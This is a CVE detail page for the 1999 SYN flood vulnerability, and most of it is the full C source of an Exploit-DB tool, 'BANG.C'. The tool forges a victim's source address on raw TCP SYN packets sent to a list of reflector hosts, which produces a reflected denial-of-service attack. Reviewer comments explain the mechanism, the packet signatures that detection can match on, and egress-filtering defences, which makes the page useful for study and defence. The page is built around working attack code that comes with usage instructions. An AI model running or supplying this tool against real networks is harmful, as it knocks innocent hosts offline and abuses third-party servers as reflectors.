CVE-1999-0116 : Detail

CVE-1999-0116

9.04%V4
Network
1999-09-29
02h00 +00:00
2024-08-01
16h27 +00:00

CVE Descriptions

Denial of service when an attacker sends many SYN packets to create multiple connections without ever sending an ACK to complete the connection, aka SYN flood.

CVE Information

Metrics

Metrics Score Severity CVSS Vector Source
V2 5 AV:N/AC:L/Au:N/C:N/I:N/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile ranks a CVE against all other scored CVEs according to its EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVEs. The percentile is therefore used to compare the EPSS score of one CVE with that of others.

Exploit information

Exploit Database EDB-ID : 343

Publication date : 2002-09-16 22h00 +00:00
Author : Nebunu
EDB Verified : Yes

/*
 * BANG.C Coded by Sorcerer of DALnet
 *
 * FUCKZ to: etech, blazin, udp, hybrid and kdl
 * PROPZ : skrilla, thanks for all your help with JUNO-Z and especially this code :)
 * --------------------------------
 * REDIRECTION DOS FINALLY DISTRIBUTED !!!!!!
 *
 * This is POC and demonstrates a new method of DoS. The idea
 * behind it is that the attacker generates connection requests
 * to a list of hosts which have a TCP service running such as
 * http (80), telnet (23) etc. from the ip of the victim host.
 * This will result all of the hosts that the victim *requested*
 * connections to send back packets (usually SYN-ACK's) 2-3 of
 * them (amplification comes here!) causing load to the victim
 * by cauzing the victim to send RST packets since it never actually
 * requested any such connection. This attack is dangerous since
 * its almost impossible to filter!!
 *
 * hosts file should be in the format of 1 ip:port per line
 * i.e. 194.66.25.97:80
 * 130.88.172.194:23
 * 65.161.42.42:6667
 * NOTE: target should only be ip, and all the hosts on the list should
 * also be ips thats for speed issues.
 *
 */

/*
 * Reviewer notes (defensive reading of this listing):
 *
 * - Scope. The page files this listing under CVE-1999-0116, whose description
 *   is the classic SYN flood (half-open connections piling up on the target).
 *   The code below does something different: it sends one SYN per listed host
 *   with the IP source address set to argv[1], so the listed hosts' replies
 *   go to that address. It is a reflected variant, not a backlog-exhaustion
 *   flood.
 *
 * - Precondition. Every packet carries a forged source address (ip_src is
 *   taken straight from the command line in send_syn()). Source-address
 *   validation at the sending network's edge (BCP 38 / RFC 2827, uRPF) drops
 *   such packets before they reach any reflector; the header's "almost
 *   impossible to filter" claim only holds where that control is absent.
 *
 * - Observables on the reflector side, all visible in send_syn(): bare SYN
 *   (th_flags 0x02), no TCP options (th_off 5), ip_tos 0x08, initial TTL 255,
 *   window field 65535, and a sequence number built from a 16-bit value, so
 *   half of the 32-bit field is always zero. ip_id, source port and sequence
 *   number all come from getrandportid(), which reseeds from the clock on
 *   every call, so the three fields can repeat each other within a packet.
 *
 * - Observables on the spoofed address: SYN-ACKs from many unrelated hosts
 *   for connections it never opened, and its own RSTs in response. A
 *   stateful filter that drops SYN-ACKs with no matching outbound SYN removes
 *   the RST load; the inbound volume still has to be handled upstream.
 */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#define __FAVOR_BSD
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>

unsigned short int getrandportid(void);
unsigned short in_cksum(u_short *addr, int len);
short int send_syn(unsigned long int , unsigned long int, unsigned short int);

/* Raw socket descriptor, opened once in main() and used by send_syn(). */
int sox;

/* Fields fed to the TCP checksum ahead of the TCP header (see send_syn()). */
struct pseudo {
    unsigned long srca, dsta;
    unsigned char zero, proto;
    unsigned short tcplen;
};

/* Buffer layout handed to in_cksum(): pseudo fields followed by the TCP header. */
struct checksum {
    struct pseudo pp;
    struct tcphdr tt;
};

/* Taken out since only works on x86 and rdtsc is also only pentium specific */
/* Everything between #if 0 and #endif is compiled out; it refers to a
 * struct packet that is not declared anywhere in this listing. */
#if 0
/* Thanks to skrilla :) */
unsigned short mktcpsum1(struct packet *p,int len)
{
    unsigned short old_sum = p->tcpsum;
    unsigned long s = (unsigned long)&p->sport;
    unsigned long sum = ((p->src >> 16) + (p->src & 0xffff) + (p->dst >> 16) + (p->dst & 0xffff) + (__htons__(6) + __htons__(len-20)));
    p->tcpsum=0;
    __asm__ __volatile__ (
        /*"xorl %%eax,%%eax;"
        "cmpl $2,%%ecx;"
        "jb 1f;"
        "0:;"
        "lodsw;"
        "addw %%ax,%%dx;"
        "jnc 9f;"
        "addl $65536,%%edx;"
        "9:;"
        "decl %%ecx;"
        "loop 0b;"
        "1:;"
        "orb %%cl,%%cl;"
        "jz 2f;"
        "xorw %%ax,%%ax;"
        "lodsb;"
        "addw %%ax,%%dx;"
        "jnz 2f;"
        "addl $65536,%%edx;"
        "2:;"
        "movw %%dx,%%ax;"
        "shrl $16,%%edx;"
        "addw %%ax,%%dx;"
        "adcl $0xffff0000,%%edx;"
        "xorw $65535,%%dx;"*/
        "movw %%dx,%%ax;"
        "shrl $16,%%edx;"
        "addw %%ax,%%dx;"
        "adcw $0,%%dx;"
        "testl $1,%%ecx;"
        "jz 0f;"
        "xorw %%ax,%%ax;"
        "lodsb;"
        "addw %%ax,%%dx;"
        "adcw $0,%%dx;"
        "0:;"
        "shrl $1,%%ecx;"
        "1:;"
        "lodsw;"
        "addw %%ax,%%dx;"
        "adcw $0,%%dx;"
        "loop 1b;"
        "andl $65535,%%edx;"
        "xorw $65535,%%dx;"
        :"=edx"(sum):"edx"(sum),"ecx"(len-20),"S"(&p->sport):"eax");
    p->tcpsum=old_sum;
    return(sum);
}

unsigned long long int rdtsc(void)
{
    unsigned long long int tsc;
    unsigned long int tsc_l,tsc_h;
    __asm__ volatile("rdtsc":"=%eax"(tsc_l),"=d"(tsc_h));
    tsc=tsc_h;
    tsc=(tsc<<32)|tsc_l;
    return(tsc);
}
#endif

/*
 * Entry point. Takes three arguments: the address placed in the IP source
 * field, a file of ip:port entries, and a repeat count. Opens a raw socket
 * with IP_HDRINCL, loads the file into the ip[]/port[] arrays, then calls
 * send_syn() once per entry per repetition and prints a summary.
 * Returns 0 on completion and -1 on any setup error.
 */
int main(int argc, char **argv)
{
    int enable=1,tmp,tmp2, loop, count=0;
    char *lala, *tmp1, buf[25];
    unsigned long int ip[1000000], src;
    unsigned short int port[1000000];
    FILE *fp;
    struct timeval start, end;

    printf("\nCoded by Sorcerer of DALnet\n\n");
    if(argc != 4){
        fprintf(stderr, "Incorrect usage try: %s <victim> <host-file> <loop host-file>\a\n", *argv);
        fprintf(stderr, "Example: %s 127.0.0.1 myhostsfile.txt 3\n\n", *argv);
        return(-1);
    }
    fp = fopen(argv[2], "r");
    if(fp == NULL){
        fprintf(stderr, "Error while opening: %s\n", argv[2]);
        perror("fopen");
        return(-1);
    }
    loop = atoi(argv[3]);
    if(loop == 0){
        fprintf(stderr, "Cannot loop 0 times you need to loop at least once\n");
        return(-1);
    }
    /* Pre-fill both tables with a default value before the file is read. */
    for(tmp=0;tmp<=1000000;tmp++){
        ip[tmp] = htons(23);
        port[tmp] = htons(23);
    }
    /* Protocol 6 is TCP. Raw sockets normally need elevated privilege
     * (root or CAP_NET_RAW on Linux), so withholding that privilege from
     * ordinary accounts is one host-level control against this class of tool. */
    sox = socket(PF_INET, SOCK_RAW, 6);
    if(sox == -1){
        perror("socket");
        return(-1);
    }
    /* IP_HDRINCL: the program supplies the IP header itself, which is what
     * lets send_syn() choose the source address. */
    tmp = setsockopt(sox, IPPROTO_IP, IP_HDRINCL, &enable, sizeof(enable));
    if(tmp == -1){
        perror("setsockopt");
        return(-1);
    }
    printf("Reading ips on memory and reconstructing in network byte order...\n");
    fflush(stdout);
    /* One ip:port entry per line; lines shorter than 9 characters are
     * reported and skipped. */
    while(1){
        memset(buf, 0, 25);
        tmp1 = fgets(buf, 25, fp);
        if(tmp1 == NULL)
            break;
        if(strlen(buf) < 9) {
            printf("Bogus entry: %s\n", buf);
            continue;
        }
        /* Split at ':' — the port text follows it, the address precedes it. */
        lala = strchr((char *)&buf, ':');
        port[count] = htons(atoi(++lala));
        buf[strlen(buf)-strlen(lala)-1] = '\0';
        ip[count] = inet_addr(buf);
        count++;
        printf(".");
        fflush(stdout);
    }
    printf("Done.\n");
    /* argv[1] becomes the source address of every packet sent below. */
    src = inet_addr(argv[1]);
    tmp = gettimeofday((struct timeval *)&start, NULL);
    if(tmp == -1){
        perror("gettimeofday");
        return(-1);
    }
    for(tmp2=0;tmp2<loop;tmp2++)
        for(tmp=0;tmp<count;tmp++)
            send_syn(src, ip[tmp], port[tmp]);
    tmp = gettimeofday((struct timeval *)&end, NULL);
    if(tmp == -1){
        perror("gettimeofday");
        return(-1);
    }
    /* NOTE(review): the printed figures are not a duration or a byte count —
     * seconds and microseconds are added together, and the header sizes are
     * multiplied rather than summed. Do not rely on them when measuring. */
    printf("\nTotal time taken: %lu\nBytes sent: %d\n", (end.tv_sec+end.tv_usec)-(start.tv_sec+start.tv_usec), count*loop*sizeof(char)*sizeof(struct ip)*sizeof(struct tcphdr));
    return 0;
}

/*
 * Builds one IPv4 + TCP header pair in a local buffer and sends it on the
 * global raw socket.
 *
 * src   value written to the IP source field and the checksum pseudo fields
 * dst   value written to the IP destination field and the sendto() address
 * port  value written unchanged to th_dport (main() already applied htons)
 *
 * Returns 0 on success, -1 if sendto() fails.
 *
 * The constant fields set here (TOS 0x08, TTL 255, SYN only, data offset 5,
 * window 65535) are the same in every packet and are what a capture or IDS
 * rule on a reflector would match on.
 */
short int send_syn(unsigned long int src, unsigned long int dst, unsigned short int port)
{
    struct sockaddr_in s;
    struct ip *i;
    struct tcphdr *t;
    struct pseudo p;
    struct checksum c;
    char packet[sizeof(char)*(sizeof(struct ip)+sizeof(struct tcphdr))];
    int tmp;

    s.sin_family = PF_INET;
    s.sin_port = port;
    s.sin_addr.s_addr = dst;
    /* The TCP header sits directly after the fixed-size IP header. */
    i = (struct ip *)&packet;
    t = (struct tcphdr *)((int)i+sizeof(struct ip));
    memset(&packet, 0, sizeof(packet));
    i->ip_hl = 5;
    i->ip_v = 4;
    i->ip_tos = 0x08;
    i->ip_len = htons(sizeof(packet));
    i->ip_id = htons(getrandportid());
    i->ip_off = 0;
    i->ip_ttl = 255;
    i->ip_p = 6;
    i->ip_sum = 0;
    /* Source address is caller-supplied, not the sending host's own. */
    i->ip_src.s_addr = src;
    i->ip_dst.s_addr = dst;
    t->th_sport = htons(getrandportid());
    t->th_dport = port;
    /* Only a 16-bit value is stored in the sequence-number field. */
    t->th_seq = htons(getrandportid());
    t->th_ack = 0;
    t->th_x2 = 0;
    t->th_off = 5;
    t->th_flags = 0x02;    /* SYN */
    t->th_win = 65535;
    t->th_urp = 0;
    t->th_sum = 0;
    /* Checksum input: pseudo fields plus a copy of the TCP header. */
    p.srca = src;
    p.dsta = dst;
    p.proto = 6;
    p.tcplen = htons(sizeof(struct tcphdr));
    p.zero = 0;
    memcpy(&c.pp, &p, sizeof(p));
    memcpy(&c.tt, t, sizeof(struct tcphdr));
    t->th_sum = in_cksum((void *)&c, sizeof(c));
    tmp = sendto(sox, packet, ntohs(i->ip_len), MSG_DONTWAIT, (struct sockaddr *)&s, sizeof(s));
    if(tmp == -1){
        perror("sendto");
        return(-1);
    }
    return 0;
}

/*
 * Returns a 16-bit value used for the IP id, the TCP source port and the
 * sequence number. The generator is reseeded from the current time on every
 * call, so calls made within the same microsecond return the same value.
 */
unsigned short int getrandportid(void)
{
    unsigned short int port;
    struct timeval tv;
    gettimeofday((struct timeval *)&tv, NULL);
    srand(tv.tv_sec+tv.tv_usec);
    port = rand()+1;
    return(port);
}

/* Slow shit checksum function from RFC */
/*
 * Sums the buffer as 16-bit words, adds a trailing odd byte if there is one,
 * folds the carries back into the low 16 bits and returns the complement.
 *
 * addr  start of the data to checksum
 * len   length of the data in bytes
 */
u_short in_cksum(u_short *addr, int len)
{
    register int nleft = len;
    register u_short *w = addr;
    register int sum = 0;
    u_short answer = 0;

    while (nleft > 1) {
        sum += *w++;
        nleft -= 2;
    }
    /* Odd length: the last byte is added on its own. */
    if (nleft == 1) {
        *(u_char *)(&answer) = *(u_char *) w;
        sum += answer;
    }
    /* Fold the upper 16 bits into the lower 16, twice to absorb the carry. */
    sum = (sum >> 16) + (sum & 0xffff);
    sum += (sum >> 16);
    answer = ~sum;
    return(answer);
}

// milw0rm.com [2002-09-17]

Products Mentioned

Configuration 0

Ibm>>Aix >> Version 3.2.5

Ibm>>Aix >> Version 4.1

Ibm>>Aix >> Version 4.2

Configuration 0

Ibm>>Sng >> Version 2.1

Ibm>>Sng >> Version 2.2

References